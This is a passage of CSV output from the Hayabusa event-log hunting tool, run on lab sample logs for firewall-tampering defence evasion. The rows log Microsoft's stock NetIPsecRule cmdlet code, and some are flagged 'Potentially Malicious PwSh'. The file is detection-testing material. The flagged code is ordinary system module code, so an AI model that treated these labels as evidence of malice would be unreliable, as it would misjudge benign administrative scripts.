(@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper 
$PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 
'Default')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] 
[Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 
'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
